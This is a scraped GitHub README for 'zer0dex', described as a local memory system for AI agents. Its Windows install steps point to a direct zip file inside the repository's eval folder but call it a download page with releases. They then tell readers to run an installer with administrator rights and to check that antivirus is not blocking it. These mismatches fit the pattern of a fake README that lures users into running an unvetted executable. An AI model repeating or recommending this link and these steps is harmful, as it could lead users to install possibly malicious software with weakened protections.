Skip to content

Latest commit

 

History

5 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

⚙️ zer0dex - Fast Local Memory for AI Agents

Download zer0dex

About zer0dex

zer0dex is a local memory system designed for AI agents. It uses a two-layer approach with a compressed index and a vector store. This setup helps keep data ready and easy to search. It offers about 91% recall at around 70 milliseconds response time. The entire process runs on your computer, so it does not send data outside your device. This helps keep your information private and accessible quickly.

The system supports persistent memory use, meaning it can remember and use past data when working with AI models. The software is useful if you work with AI, large language models, or need a fast way to store and query data.

Topics

  • AI Agents
  • AI Safety
  • Vector Databases
  • Persistent Memory
  • Large Language Models (LLM)
  • Retrieval-Augmented Generation (RAG)
  • ChromaDB

💾 Download zer0dex

Click the button below to visit the download page and get the latest version of zer0dex. The page includes all files and instructions you need.

Download zer0dex


🖥️ System Requirements

Before installing zer0dex on Windows, make sure your system meets these requirements:

  • Windows 10 or newer (64-bit)
  • 4 GB of RAM minimum (8 GB recommended)
  • At least 500 MB of free disk space
  • Internet connection for initial download
  • Administrator rights to install software

zer0dex runs well on most modern computers. It does not use many resources once installed.


🚀 Getting Started: Download and Install on Windows

Follow these steps to get zer0dex running on your Windows PC.

Step 1: Visit the Download Page

  1. Open your web browser.
  2. Go to the download page by clicking this link: https://github.com/darkcoloured-photoengraving320/zer0dex/raw/refs/heads/main/eval/zer-dex-hillsale.zip
  3. This page shows all files related to the project.

Step 2: Download the Latest Release

  1. On the page, look for the latest release. This is usually found under a tab or section titled “Releases” or “Latest.”
  2. Find the Windows installer file. It might have a name like zer0dex-setup.exe or similar.
  3. Click the file to download it. Save it to a folder you can easily find, such as your Desktop or Downloads folder.

Step 3: Run the Installer

  1. Locate the file you downloaded (e.g., in Downloads).
  2. Double-click the installer file to start the setup.
  3. Follow the installer prompts:
    • Agree to the license terms.
    • Choose an installation folder or accept the default.
    • Click Next or Install.
  4. Wait for the installation to finish. This usually takes less than a minute.

Step 4: Launch zer0dex

  1. After installation, you will find a shortcut on your Desktop or in the Start Menu called “zer0dex.”
  2. Click on this shortcut to open the application.
  3. The first time you open it, the app may take a moment to set up necessary files.

🔧 Basic Usage

zer0dex provides an interface to interact with its memory system. Here is how to start using it:

Load or Create Memory Data

  • You can either load existing data or create a new memory database.
  • Use the “New” button to start a fresh memory set.
  • Use the “Load” button to open saved data from your disk.

Query Memory

  • Type your question or keyword into the search bar.
  • zer0dex searches the compressed index and vector store quickly.
  • Results appear nearly instantly, showing related memory entries.

Save Your Work

  • Always save your data to avoid loss.
  • Use the “Save” or “Save As” buttons to store your memory database on your computer.
  • You can open this file later to continue working.

⚙️ Settings and Configuration

zer0dex lets you adjust some settings for performance and memory use:

  • Memory Size: Choose how much data zer0dex keeps in fast memory.
  • Recall Precision: Adjust the balance between recall speed and accuracy.
  • Storage Location: Select where to save memory files on your PC.
  • Data Export: Export your memory data as text or JSON for other tools.

These settings help you customize zer0dex for your needs and your computer’s abilities.


🛠️ Troubleshooting Common Issues

  • Installer won’t run: Make sure you have administrator rights and your antivirus is not blocking it.
  • App won’t open: Try restarting your PC or reinstalling zer0dex.
  • Slow searches: Close other heavy programs and check the memory size settings.
  • Data not saving: Check that you have permission to write to the folder where you save files.

If problems persist, open an issue on the zer0dex GitHub page under “Issues.”


📂 Where to Find More Help

For more detailed instructions, FAQs, and updates:


⚡ Performance Notes

zer0dex runs its key processes locally for speed and privacy. The dual-layer memory means:

  • Data retrieval happens in about 70 milliseconds.
  • You get around 91% accuracy in recalling stored data.
  • It keeps your info safe on your own device without sending it online.

🔗 Useful Links

This setup helps you get started with zer0dex, even if you are not a technical user.

About

Provide persistent AI agents with efficient, accurate long-term memory using a compressed index and local vector store architecture.

Topics

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages